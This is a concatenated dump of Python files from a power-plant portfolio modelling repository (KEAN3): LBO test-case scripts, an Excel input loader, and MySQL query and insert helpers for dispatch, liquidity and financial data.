# "ERCOT", "HAYSEN3_4", "ERCOT", "HB_SOUTH", date(2017,1,1), date(2019,12,31), 'Day Ahead', 'Hays'
# name, fuel_type, market, node, power_hub
if plant_tech_master_file:
ready_to_kean_pp_df, ready_to_kean_tech_df = load_pp_tech_info(plant_tech_master_file)
ready_to_kean_tech_df['project'] = project_name
if push_to_powerplant:
put_powerplant(ready_to_kean_pp_df)
if push_to_technology:
put_technology(ready_to_kean_tech_df)
powerplant_df = get_powerplants_by_portfolio(project_name)
if plant_list != []:
powerplant_df = powerplant_df.loc[powerplant_df.name.isin(plant_list)]
technology_df = get_technology(project_name)
print (len(powerplant_df))
print (len(technology_df))
ready_to_kean_converted_pc_df = convert_uc_dataframe(powerplant_df, technology_df, pc_scenario, pc_version, date_start, date_end)
if push_to_plant_characteristics:
put_characteristics(ready_to_kean_converted_pc_df, pc_scenario, pc_version)
return ready_to_kean_converted_pc_df
def run_basis_calculation(powerplant_df,basis_start_date, basis_end_date, selected_powerplant_list=None):
portfolio_basis_result_df = pd.DataFrame()
portfolio_basis_detail_df = pd.DataFrame()
for index, row in powerplant_df.iterrows():
if selected_powerplant_list is None:
if row['node'] != '' and row['power_hub'] != '':
test_pp = Powerplant(row['name'], row['fuel_type'], row['market'], row['node'], row['power_hub'])
merged_hub_nodal_lmp_df, monthly_onoffpeak_basis_df = test_pp.build_basis(basis_start_date, basis_end_date, 'Day Ahead')
portfolio_basis_result_df = portfolio_basis_result_df.append(monthly_onoffpeak_basis_df)
portfolio_basis_detail_df = portfolio_basis_detail_df.append(merged_hub_nodal_lmp_df)
else:
if row['node'] != '' and row['power_hub'] != '' and row['name'] in selected_powerplant_list:
test_pp = Powerplant(row['name'], row['fuel_type'], row['market'], row['node'], row['power_hub'])
merged_hub_nodal_lmp_df, monthly_onoffpeak_basis_df = test_pp.build_basis(basis_start_date, basis_end_date, 'Day Ahead')
portfolio_basis_result_df = portfolio_basis_result_df.append(monthly_onoffpeak_basis_df)
portfolio_basis_detail_df = portfolio_basis_detail_df.append(merged_hub_nodal_lmp_df)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
portfolio_basis_result_df = pd.melt(portfolio_basis_result_df, id_vars=['month','peak_info','plant'],
value_vars=['basis_$','basis_%'],
var_name='instrument',
value_name='value')
portfolio_basis_result_df['instrument_id'] = portfolio_basis_result_df.apply(lambda row: row['plant'] + ' basis - ' + row['peak_info'] + "_" + row['instrument'].split("_")[1], axis=1)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
portfolio_basis_result_df = pd.pivot_table(portfolio_basis_result_df, index=['month'], columns=['instrument_id'], values='value', aggfunc=np.sum)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
return portfolio_basis_result_df, portfolio_basis_detail_df
def load_nondispatchable_plants(portfolio, scenario, version, type, plant_name, assumptions_file_path):
if type == 'solar':
solar_plant = plant_name
solar_dispatch_df = load_solar_dispatch(portfolio, scenario, version, solar_plant, assumptions_file_path)
put_dispatch(portfolio, scenario, version, solar_dispatch_df)
if type == 'nuclear':
nuc_plant = plant_name
nuc_dispatch_df = load_nuclear_dispatch(portfolio, scenario, version, nuc_plant, assumptions_file_path)
put_dispatch(portfolio, scenario, version, nuc_dispatch_df)
def load_lbo_assumptions(lbo_assumptions_file_path, portfolio, scenario, version, fsli_list, overwrite_option):
total_lbo_assumptions_input_df = read_excel_lbo_inputs(lbo_assumptions_file_path, fsli_list)
total_lbo_assumptions_input_df['scenario'] = scenario
total_lbo_assumptions_input_df['version'] = version
total_lbo_assumptions_input_df['portfolio'] = portfolio
ready_to_kean_lbo_assumptions_df = total_lbo_assumptions_input_df
put_lbo_assumptions(ready_to_kean_lbo_assumptions_df, portfolio, scenario, version, overwrite_option=overwrite_option)
if __name__ == '__main__':
portfolio = 'Norway'
portfolio_obj = Portfolio('Norway')
powerplant_df = get_powerplants_by_portfolio(portfolio)
# powerplant_df.to_csv("ppd.csv")
""" 1 Convert PCUC file and save it to KEAN """
# plant_tech_master_file = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\pcuc\Norway plant char assumption_input v11.xlsx"
# pc_date_start = date(2020, 1, 1)
# pc_date_end = date(2027,12,31)
# pc_scenario = 'Norway Converted'
# pc_version = 'v1'
# # run_convert_uc(plant_tech_master_file, pc_date_start, pc_date_end, pc_scenario, pc_version)
# run_convert_uc('Norway', pc_date_start, pc_date_end, pc_scenario, pc_version, plant_tech_master_file=plant_tech_master_file, push_to_powerplant=False, push_to_technology=True, push_to_plant_characteristics=False)
#
""" get powerplant_df """
# basis_start_date = date(2017,1,1)
# basis_end_date = date(2019,12,31)
# # selected_powerplant_list = ['Joppa_EEI','Fayette','Hanging Rock']
#
# """ 2 Calcualate basis data for powerplants """
# portfolio_basis_result_df, portfolio_basis_detail_df = run_basis_calculation(powerplant_df,basis_start_date, basis_end_date)
# portfolio_basis_result_df.to_excel("basis_result_prices_loader.xlsx")
# portfolio_basis_detail_df.to_csv("portfolio_basis_detail_df.csv")
""" 3 load non-dispatchable plants gross energy margin profile """
# nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\norway_solar_nuclear_assumptions_v2.xlsx'
#
# # portfolio, scenario, version, type, plant_name, assumptions_file_path
""" Norway nuclears and solar """
# nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\norway_solar_nuclear_assumptions_v3_0226.xlsx'
# # portfolio, scenario, version, type, plant_name, assumptions_file_path
# load_nondispatchable_plants('Norway', 'Norway Nuclear', 'v2', 'nuclear', 'South Texas', nondispatchable_assumptions_file_path)
# sys.exit()
""" 4 put lbo assumptions """
lbo_assumptions_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\Dispatch Model Inputs_Norway_v4_3.18.20.xlsx"
fsli_list = ['Capacity Revenue','FOM','Taxes','Insurance','Fixed Costs','Hedges','Fixed Fuel Transport','Other Revenue','Ancillary Revenue','Capex']
lbo_assumptions_scenario = 'Norway'
lbo_assumptions_version = 'v4'
# load_lbo_assumptions(lbo_assumptions_file_path, 'Norway', lbo_assumptions_scenario, lbo_assumptions_version, fsli_list, overwrite_option=True)
# sys.exit()
""" 5 run financials """
""" 5.1 get lbo assumptions from KEAN3 """
lbo_assumptions_df = get_lbo_assumptions('Norway', lbo_assumptions_scenario, lbo_assumptions_version)
""" 5.2 get dispatch from KEAN3 """
dispatch_scenario = 'Norway 20200226'
dispatch_version = 'v1'
dispatch_df = get_dispatch(portfolio, dispatch_scenario, dispatch_version)
""" 5.3 build lbo financials """
lbo_financials_scenario = 'Norway'
lbo_financials_version = 'v7'
entity_list = powerplant_df['name']
print ("number of powerplants: ", len(powerplant_df))
print ("number of dispatch records: ", len(dispatch_df))
print ("number of lbo assumptions records: ", len(lbo_assumptions_df))
lbo_financials_df = lbo.build_lbo_financials(powerplant_df, portfolio, lbo_financials_scenario, lbo_financials_version, dispatch_df, lbo_assumptions_df)
# lbo_financials_df.to_csv("lbo_financials_df.csv")
""" 5.4 put lbo financials to KEAN3 """
put_financials_lbo(lbo_financials_df, portfolio, lbo_financials_scenario, lbo_financials_version, True)
""" 5.5 put scenario master information to KEAN3 """
ready_to_kean_sm_df = pd.DataFrame(columns=['portfolio',
'output_module',
'output_table',
'output_scenario',
'output_version',
'input_module',
'input_table',
'input_scenario',
'input_version',
'scenario_level',
'comment'],
data=[[portfolio, 'financials', 'financials_lbo',
lbo_financials_scenario, lbo_financials_version,
'lbo_assumptions', 'EXCEL', 'LBO Assumptions', lbo_assumptions_file_path.split(".")[0][-2:], 'scenario', lbo_assumptions_file_path],
[portfolio, 'financials', 'financials_lbo',
lbo_financials_scenario, lbo_financials_version,
'dispatch', 'dispatch', dispatch_scenario, dispatch_version, 'scenario_master', '']])
delete_scenario_master(portfolio, lbo_financials_scenario, lbo_financials_version, 'financials', 'financials_lbo')
insert_scenario_master(ready_to_kean_sm_df)
#
""" 5.6 get lbo financials from KEAN3 and write regular report """
# display simple report for lbo_financials
lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
lbo.write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio)
""" diff report """
if __name__ == '__main__Vector':
portfolio = 'Vector'
portfolio_obj = Portfolio('Vector')
powerplant_df = get_powerplants_by_portfolio(portfolio)
# powerplant_df.to_csv("ppd.csv")
""" 1 Convert PCUC file and save it to KEAN """
# plant_tech_master_file = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Vector\Vector plant char assumption_input 2.6.20_Gas convertion.xlsx"
# pc_date_start = date(2020, 1, 1)
# pc_date_end = date(2027,12,31)
# pc_scenario = 'Vector Gas Conversion'
# pc_version = 'v1'
# # run_convert_uc(plant_tech_master_file, pc_date_start, pc_date_end, pc_scenario, pc_version)
# run_convert_uc('Vector', pc_date_start, pc_date_end, pc_scenario, pc_version, plant_list=['Kincaid','Miami Fort 7 & 8','Zimmer'], plant_tech_master_file=plant_tech_master_file, push_to_powerplant=False, push_to_technology=False, push_to_plant_characteristics=True)
# sys.exit()
#
""" get powerplant_df """
# basis_start_date = date(2017,1,1)
# basis_end_date = date(2019,12,31)
# # selected_powerplant_list = ['Joppa_EEI','Fayette','Hanging Rock']
#
# """ 2 Calcualate basis data for powerplants """
# portfolio_basis_result_df, portfolio_basis_detail_df = run_basis_calculation(powerplant_df,basis_start_date, basis_end_date)
# portfolio_basis_result_df.to_excel("basis_result_prices_loader.xlsx")
# portfolio_basis_detail_df.to_csv("portfolio_basis_detail_df.csv")
""" 3 load non-dispatchable plants gross energy margin profile """
# nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lbo_assumptions\norway_solar_nuclear_assumptions_v2.xlsx'
#
# # portfolio, scenario, version, type, plant_name, assumptions_file_path
# load_nondispatchable_plants(portfolio, 'Vector Solar', 'v2', 'solar', 'Upton 2', nondispatchable_assumptions_file_path)
# load_nondispatchable_plants('Norway', 'Norway Nuclear Modified Power', 'v1', 'nuclear', 'South Texas', nondispatchable_assumptions_file_path)
""" Vector nuclears and solar """
# nondispatchable_assumptions_file_path = r'C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Vector\solar_nuclear_assumptions_v7.2_0313.xlsx'
# #
# # # portfolio, scenario, version, type, plant_name, assumptions_file_path
# load_nondispatchable_plants('Vector', 'Vector Nuclear', 'v7.2', 'nuclear', 'Comanche Peak', nondispatchable_assumptions_file_path)
# sys.exit()
""" 4 put lbo assumptions """
lbo_assumptions_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Vector\Dispatch Model Inputs_Margin_for V6 and V7_v10.xlsx"
# fsli_list = ['ICAP', 'Capacity Revenue','FOM','Taxes','Insurance','Fixed Costs','Hedges','Fixed Fuel Transport','Other Revenue','Ancillary Revenue','Capex']
lbo_assumptions_scenario = 'Vector'
lbo_assumptions_version = 'v10'
# load_lbo_assumptions(lbo_assumptions_file_path, 'Vector', lbo_assumptions_scenario, lbo_assumptions_version, fsli_list, overwrite_option=True)
#
# sys.exit()
""" 5 run financials """
""" 5.1 get lbo assumptions from KEAN3 """
lbo_assumptions_df = get_lbo_assumptions('Vector', lbo_assumptions_scenario, lbo_assumptions_version)
print (len(lbo_assumptions_df))
""" 5.2 get dispatch from KEAN3 """
dispatch_scenario = 'Vector 20200226 Adjusted'
dispatch_version = 'v4.2'
dispatch_df = get_dispatch(portfolio, dispatch_scenario, dispatch_version)
""" 5.3 build lbo financials """
lbo_financials_scenario = 'Vector'
lbo_financials_version = 'v12.2'
entity_list = powerplant_df['name']
lbo_financials_df = lbo.build_lbo_financials(powerplant_df, portfolio, lbo_financials_scenario, lbo_financials_version, dispatch_df, lbo_assumptions_df)
# lbo_financials_df.to_csv("lbo_financials_df.csv")
""" 5.4 put lbo financials to KEAN3 """
put_financials_lbo(lbo_financials_df, portfolio, lbo_financials_scenario, lbo_financials_version, True)
""" 5.5 put scenario master information to KEAN3 """
ready_to_kean_sm_df = pd.DataFrame(columns=['portfolio',
'output_module',
'output_table',
'output_scenario',
'output_version',
'input_module',
'input_table',
'input_scenario',
'input_version',
'scenario_level',
'comment'],
data=[[portfolio, 'financials', 'financials_lbo',
lbo_financials_scenario, lbo_financials_version,
'lbo_assumptions', 'lbo_assumptions', 'LBO Assumptions', lbo_assumptions_file_path.split(".")[0][-2:], 'scenario', lbo_assumptions_file_path],
[portfolio, 'financials', 'financials_lbo',
lbo_financials_scenario, lbo_financials_version,
'dispatch', 'dispatch', dispatch_scenario, dispatch_version, 'scenario_master', 're-adjust curves based on info from BX 0306']])
delete_scenario_master(portfolio, lbo_financials_scenario, lbo_financials_version, 'financials', 'financials_lbo')
insert_scenario_master(ready_to_kean_sm_df)
#
""" 5.6 get lbo financials from KEAN3 and write regular report """
# display simple report for lbo_financials
lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
lbo.write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio)
""" diff report """
# portfolio = 'Norway'
# first_lbo_scenario = 'Norway'
# first_lbo_version = 'v3'
# second_lbo_scenario = 'Norway'
# second_lbo_version = 'v1'
#
# first_lbo_financials_df = get_financials_lbo(portfolio, first_lbo_scenario, first_lbo_version)
# second_lbo_financials_df = get_financials_lbo(portfolio, second_lbo_scenario, second_lbo_version)
# lbo.write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df)
# """ graphs output """
# portfolio = 'Vector'
# lbo_financials_scenario = 'Vector'
# lbo_financials_version = 'v7.1'
# lbo_graph_output_template = 'Dispatch Output_Graphs template.xlsx'
# lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
# lbo.write_lbo_graph_report('Dispatch Output_Graphs template.xlsx', lbo_financials_df)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,733 | changliukean/KEAN3 | refs/heads/master | /utility/lboUtils.py | import pandas as pd
import sys
def read_excel_lbo_inputs(file_path, load_fsli_list):
raw_lbo_inputs_df = pd.DataFrame()
for load_fsli in load_fsli_list:
fsli_tab_name = "Value_" + "_".join(load_fsli.split(" "))
print (fsli_tab_name)
first_cell_name = "Output_" + "_".join(load_fsli.split(" "))
temp_raw_fsli_inputs_df = pd.read_excel(file_path, sheet_name=fsli_tab_name)
temp_raw_fsli_inputs_df.rename(columns={'Unnamed: 1':'unit', first_cell_name:'entity'}, inplace=True)
temp_raw_fsli_inputs_df = temp_raw_fsli_inputs_df.iloc[3:]
melted_raw_fsli_inputs_df = pd.melt(temp_raw_fsli_inputs_df,
id_vars=['entity','unit'],
value_vars=[item for item in list(temp_raw_fsli_inputs_df.columns) if item != 'entity' and item != 'unit'],
var_name='period',
value_name='value')
melted_raw_fsli_inputs_df['fsli'] = load_fsli
raw_lbo_inputs_df = raw_lbo_inputs_df.append(melted_raw_fsli_inputs_df)
return raw_lbo_inputs_df
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,734 | changliukean/KEAN3 | refs/heads/master | /lbo_oob_testcases.py | from utility.dispatchUtils import load_pp_tech_info, convert_uc_dataframe, load_solar_dispatch, load_nuclear_dispatch
from datetime import datetime, date
from database.dbPCUC import put_characteristics
from database.dbDispatch import put_dispatch, get_dispatch
from database.dbLBO import put_powerplant, put_technology, get_powerplant, get_technology, put_financials_lbo, get_financials_lbo, put_lbo_assumptions, get_lbo_assumptions
from database.dbScenarioMaster import insert_scenario_master, delete_scenario_master
from utility.lboUtils import read_excel_lbo_inputs
from lbo import lbo
from model.Entity import Powerplant
from model.Portfolio import Portfolio
from utility.dateUtils import get_month_list
import numpy as np
import sys
import pandas as pd
from reportwriter.ReportWriter import ReportWriter
if __name__ == '__main__':
portfolio = Portfolio('Norway')
""" Step 1, update powerplants information under portfolio """
plant_tech_master_file = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\pcuc\Norway plant char assumption_input v12.xlsx"
# portfolio.update_powerplants_fromexcel(plant_tech_master_file, additional=False)
portfolio.get_powerplant_fromdb() # two statements to pick one, either the data is in kean or you need to load from an excel file
# sys.exit()
""" Step 2, load/update pcuc data """
pc_date_start = date(2020, 1, 1)
pc_date_end = date(2027,12,31)
pc_scenario = 'Norway Converted'
pc_version = 'v1'
technology_df = get_technology('Norway')
ready_to_kean_converted_pc_df = portfolio.bulk_convert_uc_dataframe(technology_df, pc_scenario, pc_version, pc_date_start, pc_date_end, push_to_kean=True) # set put swtich to false by default
""" Step 3, bulk calculate basis information for plants under a portfolio """
portfolio.get_powerplant_fromdb()
basis_start_date = date(2017,1,1)
basis_end_date = date(2019,12,31)
to_excel = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\lmps\calculated_basis\Norway Basis_0221.xlsx"
portfolio.bulk_prepare_basis(basis_start_date, basis_end_date, dart='Day Ahead', market='All', to_database_option=False, to_excel=to_excel)
# #
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,735 | changliukean/KEAN3 | refs/heads/master | /database/dbLiquidity.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,DATABASE, PROD_DATABASE, config_connection
from sqlalchemy import create_engine
import pandas as pd
from datetime import datetime, date
def get_financials(portfolio, scenario, version, financials_table):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM """ + financials_table + """
where
portfolio = %s
and
scenario = %s
and
version = %s;
"""
financials_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
connection_instance.close()
return financials_df
def get_scenario_assumptions(portfolio, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM scenario_assumption
where
portfolio = %s
and
scenario = %s
and
version = %s;
"""
scenario_assumptions_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
connection_instance.close()
return scenario_assumptions_df
def get_capital_structure(portfolio, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM capital_structure
where
portfolio = %s
and
scenario = %s
and
version = %s;
"""
capital_structure_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
connection_instance.close()
return capital_structure_df
# def get_revolver_change(instrument_id):
# connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
# sql_statement = """
# SELECT * FROM debt_activity
# where
# instrument_id = %s;
# """
#
# debt_activity_df = pd.read_sql(sql_statement, connection_instance, params=[instrument_id])
# connection_instance.close()
# return debt_activity_df
def get_debt_activity(instrument_id):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM debt_activity
where
instrument_id = %s;
"""
debt_activity_df = pd.read_sql(sql_statement, connection_instance, params=[instrument_id])
connection_instance.close()
return debt_activity_df
def get_waterfall(portfolio, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM waterfall
where
portfolio = %s
and
scenario = %s
and
version = %s
;
"""
waterfall_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
connection_instance.close()
return waterfall_df
def get_distributions(portfolio):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT date, amount FROM distribution
where
portfolio = %s;
"""
distributions_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio])
connection_instance.close()
distributions = distributions_df.set_index('date')['amount'].to_dict()
return distributions
def get_paid_tax(portfolio, as_of_date):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT date, amount FROM distribution
where
portfolio = %s
and
type = 'permitted tax distribution'
and
date <= %s
;
"""
paid_tax_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, as_of_date])
connection_instance.close()
paid_tax_df = paid_tax_df.set_index('date')['amount'].to_dict()
return paid_tax_df
def get_cash_balance(portfolio, forecast_start_month):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM cash_balance
where
portfolio = %s
and
as_of_date < %s
;
"""
cash_balances_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, forecast_start_month])
connection_instance.close()
return cash_balances_df
def get_asset_depreciation(portfolio):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """ SELECT * FROM asset_depreciation where portfolio = %s; """
asset_depreciation_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio])
return asset_depreciation_df
def get_swap(portfolio, instrument_id):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """ SELECT * FROM swap
where portfolio = %s
and instrument_id = %s
;
"""
swap_rates_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, instrument_id])
return swap_rates_df
def get_curves(scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """ SELECT * FROM curve
where scenario = %s
and version = %s
;
"""
curves_df = pd.read_sql(sql_statement, connection_instance, params=[scenario, version])
return curves_df
def get_rw_headers(name='Default'):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """ SELECT * FROM rw_headers
where name = %s;
"""
rw_headers_df = pd.read_sql(sql_statement, connection_instance, params=[name])
return rw_headers_df
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,736 | changliukean/KEAN3 | refs/heads/master | /database/dbDispatch.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,PROD_DATABASE,config_connection
from sqlalchemy import create_engine
import pandas as pd
def get_dispatch(portfolio, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, PROD_DATABASE)
sql_statement = "Select * from dispatch where company = %s and scenario = %s and version = %s; "
dispatch_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
return dispatch_df
def put_dispatch(portfolio, scenario, version, ready_to_kean_dispatch_df):
connection_instance = config_connection(HOST, USER, PASSWORD, PROD_DATABASE)
delete_sql_statment = """
DELETE FROM dispatch
where
company = '""" + portfolio + """'
and
scenario = '""" + scenario + """'
and
version = '""" + version + """';
"""
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + PROD_DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
step = 3000
current_index = 0
while current_index + step < len(ready_to_kean_dispatch_df):
ready_to_kean_dispatch_df.iloc[current_index:current_index+step].to_sql(name='dispatch', con=engine, if_exists='append', index=False)
current_index += step
ready_to_kean_dispatch_df.iloc[current_index:].to_sql(name='dispatch', con=engine, if_exists='append', index=False)
# #
